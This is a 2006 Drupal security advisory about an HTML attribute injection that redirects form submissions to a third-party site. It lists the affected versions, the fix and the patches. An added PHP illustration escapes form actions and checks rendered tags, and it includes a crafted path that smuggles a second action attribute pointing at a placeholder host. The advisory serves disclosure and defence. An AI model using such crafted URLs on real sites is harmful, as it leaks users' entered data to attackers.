[DRUPAL-SA-2006-026] Drupal 4.6.10 / 4.7.4 fixes HTML attribute injection issue

2006-10-21T00:00:00
ID SECURITYVULNS:DOC:14756
Type securityvulns
Reporter Securityvulns
Modified 2006-10-21T00:00:00

Description

------------------------------------------------------------------------

Drupal security advisory DRUPAL-SA-2006-026


Project: Drupal core
Date: 2006-Oct-18
Security risk: Less critical
Exploitable from: Remote
Vulnerability: HTML attribute injection



Description

A malicious user may entice users to visit a specially crafted URL that may result in the redirection of a Drupal form submission to a third-party site. A user visiting the user registration page via such a URL, for example, will submit all entered data, such as his/her e-mail address, but also possibly private profile data, to the third-party site.
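The pattern behind this class of bug is a request-derived value (here, the current path) written into a form's `action` attribute without attribute-context escaping. The following PHP is an added illustration written for this page, not Drupal's own form code or the actual patch: the function names, the constructed request URIs and the `third-party.invalid` placeholder host are all assumptions. It shows the unsafe interpolation beside the escaped version and a small markup check a reviewer can run over rendered forms.

```php
<?php
// Added illustration, not Drupal code: unescaped request path in a form
// "action" attribute versus the attribute-escaped version.

// Unsafe pattern: the request URI is interpolated straight into HTML, so a
// double quote in the path ends the attribute value early.
function form_action_unsafe(string $request_uri): string {
    return '<form action="' . $request_uri . '" method="post">';
}

// Hardened pattern: escape for an attribute context. ENT_QUOTES encodes both
// quote styles, so the value can no longer terminate the attribute.
// (Mirrors the intent of the fix, not its exact code.)
function form_action_safe(string $request_uri): string {
    $escaped = htmlspecialchars($request_uri, ENT_QUOTES, 'UTF-8');
    return '<form action="' . $escaped . '" method="post">';
}

// Review/detection check over a rendered <form> tag: exactly one quoted
// action attribute may be present. A second quoted "action=" means the
// attribute value was able to break out of its quotes.
function form_tag_is_sound(string $form_tag): bool {
    return preg_match_all('/\baction\s*=\s*["\']/i', $form_tag) === 1;
}

// Constructed sample inputs (not taken from the advisory).
$benign  = '/user/register';
$crafted = '/user/register" action="https://third-party.invalid/collect';

foreach ([$benign, $crafted] as $uri) {
    $unsafe = form_action_unsafe($uri);
    $safe   = form_action_safe($uri);
    printf("unsafe: %s -> %s\n", $unsafe, form_tag_is_sound($unsafe) ? 'ok' : 'INJECTED');
    printf("safe:   %s -> %s\n", $safe,   form_tag_is_sound($safe)   ? 'ok' : 'INJECTED');
}
```

With the constructed crafted path, `form_action_unsafe` renders a tag carrying two `action` attributes and `form_tag_is_sound` flags it, while `form_action_safe` keeps the whole path inside one attribute value (`&quot;` instead of `"`). Whichever attribute a given browser ends up honouring, a rendered form with duplicate or stray attributes is the signal to look for when auditing templates that echo request data.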

Versions affected

  • Drupal 4.6.x versions before Drupal 4.6.10
  • Drupal 4.7.x versions before Drupal 4.7.4

Solution

  • If you are running Drupal 4.6.x then upgrade to Drupal 4.6.10. http://ftp.osuosl.org/pub/drupal/files/projects/drupal-4.6.10.tar.gz
  • If you are running Drupal 4.7.x then upgrade to Drupal 4.7.4. http://ftp.osuosl.org/pub/drupal/files/projects/drupal-4.7.4.tar.gz

  • To patch Drupal 4.6.9 use http://drupal.org/files/sa-2006-026/4.6.9.patch.
  • To patch Drupal 4.7.3 use http://drupal.org/files/sa-2006-026/4.7.3.patch.

Please note that the patches only contain changes related to this advisory, and do not fix bugs that were solved in 4.6.10 or 4.7.4.

Reported by

Frederic Marand.

Contact

The security contact for Drupal can be reached at security at drupal.org or using the form at http://drupal.org/contact.

// Uwe Hermann, on behalf of the Drupal Security Team.

Uwe Hermann
http://www.hermann-uwe.de
http://www.it-services-uh.de | http://www.crazy-hacks.org
http://www.holsham-traders.de | http://www.unmaintained-free-software.org

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.5 (GNU/Linux)

iD8DBQFFN7D2XdVoV3jWIbQRAn30AJ4wDXVgTcsZ6AVZU0iz8oFYqTx8dACeNXFj
D4MxzZKaxPKknex3KMezI6Y=
=eFVr
-----END PGP SIGNATURE-----